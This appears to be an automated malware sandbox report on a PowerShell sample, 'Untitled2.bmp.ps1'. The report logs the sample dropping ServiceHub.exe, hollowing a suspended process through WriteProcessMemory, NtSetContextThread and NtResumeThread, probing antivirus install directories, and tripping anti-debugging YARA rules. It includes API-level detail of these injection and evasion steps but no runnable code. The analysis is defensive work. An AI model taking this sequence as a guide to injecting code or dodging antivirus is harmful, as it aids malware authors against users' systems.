NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 2268 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x009ff000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 2268 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x009f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Roaming\ServiceHub.exe

File has been identified by 6 AntiVirus engines on VirusTotal as malicious (6 events)

Sangfor	Trojan.Generic-PS.Save.a07703bf
Symantec	ISB.Downloader!gen173
Avast	Script:SNH-gen [Trj]
Sophos	Mal/PSDL-J
Google	Detected
AVG	Script:SNH-gen [Trj]

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW July 25, 2023, 9:05 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW July 25, 2023, 9:05 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (7 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Bypass DEP	rule	disable_dep

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 2524 region_size: 200704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000310	1	0	0

Attempts to identify installed AV products by installation directory (9 events)

file	C:\Program Files\AVAST Software\Avast\avastUI.exe
file	C:\Program Files (x86)\AVAST Software\Avast\avastUI.exe
file	C:\Program Files\Kaspersky Lab
file	C:\Program Files (x86)\Kaspersky Lab
file	C:\Program Files\McAfee\Agent
file	C:\Program Files\Trend Micro
file	C:\Program Files (x86)\Trend Micro
file	C:\Program Files\AVG\Antivirus\AVGUI.exe
file	C:\Program Files (x86)\AVG\Antivirus\AVGUI.exe

Potential code injection by writing to the memory of another process (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory July 25, 2023, 9:05 a.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿá¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $y =`gó=`gó=`gó¦¨ó:`gó¦ªó<`gó¦«ó<`góRich=`góPELn¤CàþÀ@@.text¤ýþ ` base_address: 0x00400000 process_identifier: 2524 process_handle: 0x00000310	1	1	0
WriteProcessMemory July 25, 2023, 9:05 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2524 process_handle: 0x00000310	1	1	0

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory July 25, 2023, 9:05 a.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿá¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $y =`gó=`gó=`gó¦¨ó:`gó¦ªó<`gó¦«ó<`góRich=`góPELn¤CàþÀ@@.text¤ýþ ` base_address: 0x00400000 process_identifier: 2524 process_handle: 0x00000310	1	1	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2268 called NtSetContextThread to modify thread in remote process 2524
NtSetContextThread July 25, 2023, 9:05 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4199616 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000314 process_identifier: 2524	1	0	0

One or more non-whitelisted processes were created (2 events)

parent_process	powershell.exe				martian_process	C:\Users\test22\AppData\Roaming\ServiceHub.exe
parent_process	powershell.exe				martian_process	"C:\Users\test22\AppData\Roaming\ServiceHub.exe"

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2268 resumed a thread in remote process 2524
NtResumeThread July 25, 2023, 9:05 a.m.	thread_handle: 0x00000314 suspend_count: 1 process_identifier: 2524	1	0	0

Executed a process and injected code into it, probably while unpacking (16 events)

Time & API	Arguments	Status	Return
NtResumeThread July 25, 2023, 9:05 a.m.	thread_handle: 0x000003a0 suspend_count: 1 process_identifier: 3044	1	0
CreateProcessInternalW July 25, 2023, 9:05 a.m.	thread_identifier: 2256 thread_handle: 0x0000056c process_identifier: 2268 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Roaming\ServiceHub.exe track: 1 command_line: "C:\Users\test22\AppData\Roaming\ServiceHub.exe" filepath_r: C:\Users\test22\AppData\Roaming\ServiceHub.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000570	1	1
NtResumeThread July 25, 2023, 9:05 a.m.	thread_handle: 0x0000058c suspend_count: 1 process_identifier: 3044	1	0
NtResumeThread July 25, 2023, 9:05 a.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 2268	1	0
NtResumeThread July 25, 2023, 9:05 a.m.	thread_handle: 0x00000154 suspend_count: 1 process_identifier: 2268	1	0
NtResumeThread July 25, 2023, 9:05 a.m.	thread_handle: 0x00000190 suspend_count: 1 process_identifier: 2268	1	0
NtResumeThread July 25, 2023, 9:05 a.m.	thread_handle: 0x00000260 suspend_count: 1 process_identifier: 2268	1	0
NtResumeThread July 25, 2023, 9:05 a.m.	thread_handle: 0x000002bc suspend_count: 1 process_identifier: 2268	1	0
CreateProcessInternalW July 25, 2023, 9:05 a.m.	thread_identifier: 2472 thread_handle: 0x00000314 process_identifier: 2524 current_directory: filepath: C:\Users\test22\AppData\Roaming\ServiceHub.exe track: 1 command_line: filepath_r: C:\Users\test22\AppData\Roaming\ServiceHub.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000310	1	1
NtGetContextThread July 25, 2023, 9:05 a.m.	thread_handle: 0x00000314	1	0
NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 2524 region_size: 200704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000310	1	0
WriteProcessMemory July 25, 2023, 9:05 a.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿá¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $y =`gó=`gó=`gó¦¨ó:`gó¦ªó<`gó¦«ó<`góRich=`góPELn¤CàþÀ@@.text¤ýþ ` base_address: 0x00400000 process_identifier: 2524 process_handle: 0x00000310	1	1
WriteProcessMemory July 25, 2023, 9:05 a.m.	buffer: base_address: 0x00401000 process_identifier: 2524 process_handle: 0x00000310	1	1
WriteProcessMemory July 25, 2023, 9:05 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2524 process_handle: 0x00000310	1	1
NtSetContextThread July 25, 2023, 9:05 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4199616 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000314 process_identifier: 2524	1	0
NtResumeThread July 25, 2023, 9:05 a.m.	thread_handle: 0x00000314 suspend_count: 1 process_identifier: 2524	1	0

The process powershell.exe wrote an executable file to disk which it then attempted to execute (1 event)

file	C:\Users\test22\AppData\Roaming\ServiceHub.exe

Untitled2.bmp.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All